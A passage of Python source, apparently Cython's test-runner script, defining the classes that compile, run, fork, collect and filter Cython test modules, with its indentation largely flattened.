expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
doctest_selector=self.doctest_selector,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
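# Illustration (not part of the runner): a test that switches distutils to C++
# typically carries a header line like
#
#     # distutils: language = c++
#
# which parse_tags() stores under tags['distutils'] and skip_c() picks up here.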
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
        # MSVC: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False, doctest_selector=None,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.doctest_selector = doctest_selector
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in (
'warning_errors',
'clear_to_none',
'error_on_unknown_names',
'error_on_uninitialized',
# 'cache_builtins', # not currently supported due to incorrect global caching
)
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if so_path and not stderr:
# normal success case => ignore non-error compiler output
stdout = None
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
if self.doctest_selector is not None:
tests._tests[:] = [test for test in tests._tests if self.doctest_selector(test.id())]
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file = os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
excludelist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in excludelist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None, capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + self.workdir + os.pathsep + old_path
env['PYTHONPATH'] = new_path
if not env.get("PYTHONIOENCODING"):
env["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res == 0 and b'REFNANNY: ' in _out:
res = -1
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = os.path.abspath(os.path.join('..', '..', 'cython.py'))
try:
subprocess.check_output([
"make",
"PYTHON='%s'" % sys.executable,
"CYTHON='%s'" % cython,
"LIBDIR1='%s'" % libdir,
"paths", "test",
])
except subprocess.CalledProcessError as err:
print(err.output.decode())
raise
self.assertTrue(True) # :)
def load_listfile(filename):
# just re-use the FileListExclude implementation
fle = FileListExcluder(filename)
return list(fle.excludes)
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, module_name in deps.items():
try:
module = __import__(module_name)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
print("Test dependency not found: '%s'" % module_name)
else:
version = self.find_dep_version(module_name, module)
print("Test dependency found: '%s' version %s" % (module_name, version))
self.tests_missing_deps = []
def find_dep_version(self, name, module):
try:
version = module.__version__
except AttributeError:
stdlib_dir = os.path.dirname(shutil.__file__) + os.sep
module_path = getattr(module, '__file__', stdlib_dir) # no __file__? => builtin stdlib module
if module_path.startswith(stdlib_dir):
# stdlib module
version = sys.version.partition(' ')[0]
elif '.' in name:
# incrementally look for a parent package with version
name = name.rpartition('.')[0]
return self.find_dep_version(name, __import__(name))
else:
version = '?.?'
return version
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = any(string_selector(ex)(testname) for ex in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
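# The exclude-list file format parsed above is one selector per line: blank lines and
# lines starting with '#' are skipped, and only the first whitespace-separated token of
# each line is used as the selector, e.g. (hypothetical contents):
#     # known failures
#     run.test_foo        see the issue tracker
#     memoryview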
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
